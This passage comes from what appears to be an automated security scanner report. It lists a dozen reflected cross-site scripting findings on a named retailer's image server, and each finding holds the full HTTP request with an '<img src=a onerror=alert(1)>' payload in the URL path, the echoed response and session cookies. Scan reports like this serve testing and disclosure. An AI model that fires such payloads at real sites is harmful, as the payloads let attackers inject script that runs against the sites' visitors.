Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8913964_sw_054a4224<img src=a onerror=alert(1)>8c9adb198c2

3.252. http://images3.pacsun.com/is/image/pacsunproducts/8916876_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8916876_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0 was submitted in the REST URL parameter 4. This input was echoed as 31850<img src=a onerror=alert(1)>eae6ae15ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8916876_0131850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8916876_0131850<img src=a onerror=alert(1)>eae6ae15ce0

3.253. http://images3.pacsun.com/is/image/pacsunproducts/8917569_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8917569_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998 was submitted in the REST URL parameter 4. This input was echoed as f8459<img src=a onerror=alert(1)>90c27eff998 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8917569_01f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8917569_01f8459<img src=a onerror=alert(1)>90c27eff998

3.254. http://images3.pacsun.com/is/image/pacsunproducts/8928236_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8928236_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728 was submitted in the REST URL parameter 4. This input was echoed as cac81<img src=a onerror=alert(1)>08938a5b728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8928236_01cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:12 GMT
Connection: close

Unable to find /pacsunproducts/8928236_01cac81<img src=a onerror=alert(1)>08938a5b728

3.255. http://images3.pacsun.com/is/image/pacsunproducts/8930075_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8930075_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37c75<img%20src%3da%20onerror%3dalert(1)>443dd332700 was submitted in the REST URL parameter 4. This input was echoed as 37c75<img src=a onerror=alert(1)>443dd332700 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8930075_0137c75<img%20src%3da%20onerror%3dalert(1)>443dd332700?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8930075_0137c75<img src=a onerror=alert(1)>443dd332700

3.256. http://images3.pacsun.com/is/image/pacsunproducts/8933269_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8933269_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e07ae<img%20src%3da%20onerror%3dalert(1)>d9f394bfcc3 was submitted in the REST URL parameter 4. This input was echoed as e07ae<img src=a onerror=alert(1)>d9f394bfcc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8933269_01e07ae<img%20src%3da%20onerror%3dalert(1)>d9f394bfcc3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8933269_01e07ae<img src=a onerror=alert(1)>d9f394bfcc3

3.257. http://images3.pacsun.com/is/image/pacsunproducts/8946378_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8946378_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d38b<img%20src%3da%20onerror%3dalert(1)>cf31d8f5e51 was submitted in the REST URL parameter 4. This input was echoed as 9d38b<img src=a onerror=alert(1)>cf31d8f5e51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8946378_01_0019d38b<img%20src%3da%20onerror%3dalert(1)>cf31d8f5e51?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/8946378_01_0019d38b<img src=a onerror=alert(1)>cf31d8f5e51

3.258. http://images3.pacsun.com/is/image/pacsunproducts/8946378_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8946378_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87dd2<img%20src%3da%20onerror%3dalert(1)>72dc6b7d378 was submitted in the REST URL parameter 4. This input was echoed as 87dd2<img src=a onerror=alert(1)>72dc6b7d378 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8946378_sw_00187dd2<img%20src%3da%20onerror%3dalert(1)>72dc6b7d378?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8946378_sw_00187dd2<img src=a onerror=alert(1)>72dc6b7d378

3.259. http://images3.pacsun.com/is/image/pacsunproducts/8946378_sw_048 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8946378_sw_048

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload df4f1<img%20src%3da%20onerror%3dalert(1)>8d0a9d52acf was submitted in the REST URL parameter 4. This input was echoed as df4f1<img src=a onerror=alert(1)>8d0a9d52acf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8946378_sw_048df4f1<img%20src%3da%20onerror%3dalert(1)>8d0a9d52acf?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8946378_sw_048df4f1<img src=a onerror=alert(1)>8d0a9d52acf

3.260. http://images3.pacsun.com/is/image/pacsunproducts/8961971_01_065 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8961971_01_065

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8ab4b<img%20src%3da%20onerror%3dalert(1)>20d1e3c8994 was submitted in the REST URL parameter 4. This input was echoed as 8ab4b<img src=a onerror=alert(1)>20d1e3c8994 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8961971_01_0658ab4b<img%20src%3da%20onerror%3dalert(1)>20d1e3c8994?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8961971_01_0658ab4b<img src=a onerror=alert(1)>20d1e3c8994

3.261. http://images3.pacsun.com/is/image/pacsunproducts/8961971_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8961971_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37ae8<img%20src%3da%20onerror%3dalert(1)>e810f7a2cc6 was submitted in the REST URL parameter 4. This input was echoed as 37ae8<img src=a onerror=alert(1)>e810f7a2cc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8961971_sw_00137ae8<img%20src%3da%20onerror%3dalert(1)>e810f7a2cc6?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8961971_sw_00137ae8<img src=a onerror=alert(1)>e810f7a2cc6

3.262. http://images3.pacsun.com/is/image/pacsunproducts/8961971_sw_065 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8961971_sw_065

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 967a2<img%20src%3da%20onerror%3dalert(1)>af29eec5e58 was submitted in the REST URL parameter 4. This input was echoed as 967a2<img src=a onerror=alert(1)>af29eec5e58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8961971_sw_065967a2<img%20src%3da%20onerror%3dalert(1)>af29eec5e58?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8961971_sw_065967a2<img src=a onerror=alert(1)>af29eec5e58

3.263. http://images3.pacsun.com/is/image/pacsunproducts/8982258_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8982258_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee1b3<img%20src%3da%20onerror%3dalert(1)>4280baca906 was submitted in the REST URL parameter 4. This input was echoed as ee1b3<img src=a onerror=alert(1)>4280baca906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8982258_01ee1b3<img%20src%3da%20onerror%3dalert(1)>4280baca906?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
